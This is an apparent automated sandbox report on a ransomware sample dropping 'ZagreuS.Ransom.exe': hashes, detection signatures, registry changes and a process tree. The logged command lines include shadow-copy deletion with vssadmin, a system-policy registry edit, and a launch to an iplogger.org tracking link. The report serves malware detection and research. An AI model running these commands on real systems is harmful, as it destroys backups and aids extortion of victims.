Analysis
max time kernel: 140s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 20-05-2022 09:34
Static task: static1
Behavioral task: behavioral1
  Sample: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
  Resource: win10v2004-20220414-en
General
Target: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Size: 750KB
MD5: 0f081afaae11c154edb8df747d612f93
SHA1: 7b1478e64453d78ff60eda7b1d2cc3623d4a9210
SHA256: ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858
SHA512: 4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628
Malware Config
Extracted
Path: C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt
Email: uncrushman@protonmail.com
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
Processes:
pid | process
2212 | ZagreuS.Ransom.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | ZagreuS.Ransom.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Generic Ransomware Note 7 IoCs
Ransomware often writes a note containing information on how to pay the ransom.
Processes:
resource | yara_rule
(not listed) | generic_ransomware_note
(not listed) | generic_ransomware_note
(not listed) | generic_ransomware_note
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe | generic_ransomware_note
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe | generic_ransomware_note
behavioral2/memory/2212-133-0x0000000000520000-0x000000000052C000-memory.dmp | generic_ransomware_note
C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt | generic_ransomware_note
-
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf | pdf_with_link_action
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | process
3828 | vssadmin.exe
376 | vssadmin.exe
-
Modifies Internet Explorer settings 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
-
Modifies registry class 3 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings | ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1081944012-3634099177-1681222835-1000\{9FBD5C30-5048-489B-BE3A-ED9D2EFF7F9D} | msedge.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid | process
4408 | NOTEPAD.EXE
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
pid | process
5072 | AcroRd32.exe (18 entries)
3000 | msedge.exe (2 entries)
520 | msedge.exe (2 entries)
5360 | msedge.exe (2 entries)
4680 | AdobeARM.exe (2 entries)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
pid | process
520 | msedge.exe (5 entries)
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description | pid | process
Token: SeBackupPrivilege | 2816 | vssvc.exe
Token: SeRestorePrivilege | 2816 | vssvc.exe
Token: SeAuditPrivilege | 2816 | vssvc.exe
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid | process
5072 | AcroRd32.exe
520 | msedge.exe (2 entries)
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
pid | process
5072 | AcroRd32.exe (5 entries)
4680 | AdobeARM.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 2676 wrote to memory of 2212 | 2676 | ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe | ZagreuS.Ransom.exe (2 entries)
PID 2676 wrote to memory of 5072 | 2676 | ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe | AcroRd32.exe (3 entries)
PID 2212 wrote to memory of 2792 | 2212 | ZagreuS.Ransom.exe | cmd.exe (2 entries)
PID 2212 wrote to memory of 216 | 2212 | ZagreuS.Ransom.exe | cmd.exe (2 entries)
PID 216 wrote to memory of 3828 | 216 | cmd.exe | vssadmin.exe (2 entries)
PID 2792 wrote to memory of 3944 | 2792 | cmd.exe | reg.exe (2 entries)
PID 2212 wrote to memory of 4340 | 2212 | ZagreuS.Ransom.exe | cmd.exe (2 entries)
PID 4340 wrote to memory of 376 | 4340 | cmd.exe | vssadmin.exe (2 entries)
PID 2212 wrote to memory of 520 | 2212 | ZagreuS.Ransom.exe | msedge.exe (2 entries)
PID 520 wrote to memory of 396 | 520 | msedge.exe | msedge.exe (2 entries)
PID 5072 wrote to memory of 1528 | 5072 | AcroRd32.exe | RdrCEF.exe (3 entries)
PID 5072 wrote to memory of 4420 | 5072 | AcroRd32.exe | RdrCEF.exe (3 entries)
PID 5072 wrote to memory of 3784 | 5072 | AcroRd32.exe | RdrCEF.exe (3 entries)
PID 5072 wrote to memory of 4352 | 5072 | AcroRd32.exe | RdrCEF.exe (3 entries)
PID 3784 wrote to memory of 1612 | 3784 | RdrCEF.exe | RdrCEF.exe (31 entries)
Processes
(indented by parent/child depth)

C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\reg.exe
        command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        - Modifies registry key

    C:\Windows\SYSTEM32\cmd.exe
      command line: "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\vssadmin.exe
        command line: vssadmin.exe delete shadows /all /quiet
        - Interacts with shadow copies

    C:\Windows\SYSTEM32\cmd.exe
      command line: "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\vssadmin.exe
        command line: vssadmin.exe delete shadows /all /quiet
        - Interacts with shadow copies

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2Y1Gy5
      - Enumerates system info in registry
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff8d82446f8,0x7ff8d8244708,0x7ff8d8244718

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:2

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:8

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5196 /prefetch:8

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5512 /prefetch:8

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5496 /prefetch:8
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2372,9427948889374246332,7321068856978116018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1

  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2A0B7BAA5C033A28282DFAB55F0BEF11 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=323923313D96B7F837D85DEC113CB5F9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=323923313D96B7F837D85DEC113CB5F9 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0DED7F5902850FE667EDD412B999B57B --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E15F59B4C3DFAB53F2767A4B791BA51C --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=458959A6BD1D02DF34628D0731C430D9 --mojo-platform-channel-handle=1856 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FD52362937FB0629E1BBFD50C1581C72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FD52362937FB0629E1BBFD50C1581C72 --renderer-client-id=8 --mojo-platform-channel-handle=1908 --allow-no-sandbox-job /prefetch:1

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
      command line: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
        command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"

C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\NOTEPAD.EXE
  command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
  - Opens file in notepad (likely ransom note)

C:\Windows\System32\CompPkgSrv.exe
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\mousocoreworker.exe
  command line: C:\Windows\System32\mousocoreworker.exe -Embedding
Downloads
-
C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf
Filesize: 519KB
MD5: f628a245651b09f63d2f888761d99543
SHA1: f004b9a7b6be37ba12d05167073cc2804b08ab64
SHA256: de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6
SHA512: 842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize: 27KB
MD5: 961d5eab06ae737f0425824c5cdb92d9
SHA1: 56c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA256: 4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA512: 56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize: 27KB
MD5: 961d5eab06ae737f0425824c5cdb92d9
SHA1: 56c76e63db1d7ba3eb44cf4f5e04b0976f56933a
SHA256: 4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196
SHA512: 56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd
-
C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
Filesize: 1KB
MD5: c93df85b757185a4197e3a9543e2de63
SHA1: 6f2fe4fe24a9909b274659ec3d36f5ddf760c2ab
SHA256: f78e0256d3c310252d7a5bfaee6f5fe6bd0724b4d8df5a43645d015592162689
SHA512: 635134e04dc11834a87240abeaeee9802fe57cf1abc0f6ead1aa3540e9a3b615891cd02894341026e18a47a057b4bc4738af60638801b394287a69b5e3f43569
-
\??\pipe\LOCAL\crashpad_520_KWKWARCZMZUVBAKD
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-136-0x0000000000000000-mapping.dmp
-
memory/272-162-0x0000000000000000-mapping.dmp
-
